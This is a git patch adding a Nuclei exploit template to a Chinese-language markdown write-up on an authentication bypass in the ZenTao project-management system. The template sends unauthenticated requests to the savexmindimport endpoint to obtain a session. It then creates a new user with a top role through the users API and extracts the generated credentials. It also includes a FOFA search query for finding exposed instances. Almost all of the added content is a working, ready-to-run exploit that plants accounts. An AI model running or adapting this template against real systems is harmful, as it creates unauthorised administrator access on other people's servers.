From 8d6b7f385e3c7bb61f5eee40b8b24cf190773929 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Mon, 29 Apr 2024 18:27:42 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E7=A6=85=E9=81=93=E9=A1=B9=E7=9B=AE?=
 =?UTF-8?q?=E7=AE=A1=E7=90=86=E7=B3=BB=E7=BB=9F=E8=BA=AB=E4=BB=BD=E8=AE=A4?=
 =?UTF-8?q?=E8=AF=81=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 禅道项目管理系统身份认证绕过漏洞.md | 79 +++++++++++++++++++++++++++++
 1 file changed, 79 insertions(+)

diff --git a/禅道项目管理系统身份认证绕过漏洞.md b/禅道项目管理系统身份认证绕过漏洞.md
index d63c95d..dcc600a 100644
--- a/禅道项目管理系统身份认证绕过漏洞.md
+++ b/禅道项目管理系统身份认证绕过漏洞.md
@@ -43,3 +43,82 @@ http:
 - 200
 # digest: 4a0a0047304502200b7a7cb58af457a9e566160cfdc539a99325db1513d5e4172a9a0a66f2f44e63022100fe0cc4ffd848c733eba3240bf102695253caa1420845a2b8aec5ca731e394759:58d4ffcb61df0489d6ab2fd018c17de6
 ```
+
+## 添加用户poc
+```
+id: easycorp-zentao-pms-idor-exp
+
+info:
+ name: 禅道项目管理系统身份认证绕过漏洞
+ author: GuoRong_X
+ severity: critical
+ description: |
+ - 禅道系统某些API设计为通过特定的鉴权函数进行验证,但在实际实现中,这个鉴权函数在鉴权失败后并不中断请求,而是仅返回一个错误标志,这个返回值在后续没有被适当处理。此外,该系统在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。
+ reference:
+ - https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw
+ metadata:
+ verified: true
+ fofa-query: title="用户登录- 禅道"
+ tags: zentao
+variables:
+ username: '{{rand_base(6)}}'
+ password: '{{rand_base(12)}}'
+
+http:
+ - raw:
+ - |
+ GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /max/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /api.php/v1/users HTTP/1.1
+ Host: {{Hostname}}
+
+ {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
+
+ - |
+ POST /zentao/api.php/v1/users HTTP/1.1
+ Host: {{Hostname}}
+
+ {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
+
+ - |
+ POST /biz/api.php/v1/users HTTP/1.1
+ Host: {{Hostname}}
+
+ {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
+
+ - |
+ POST /max/api.php/v1/users HTTP/1.1
+ Host: {{Hostname}}
+
+ {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
+ cookie-reuse: true
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_5, "{{username}}") || contains(body_6, "{{username}}") || contains(body_7, "{{username}}") || contains(body_8, "{{username}}")'
+ condition: and
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"USER: "+ username'
+ - '"PASS: "+ password'
+# digest: 4a0a00473045022100f877e8e0df5985e15645227a3f12f66e08fe50250102f4df141f234afcc0e2e90220485c468e8de448c3e9c92875d8a1bd6d8fafffa0f294fffd4a4443e221e6de6b:58d4ffcb61df0489d6ab2fd018c17de6
+
+```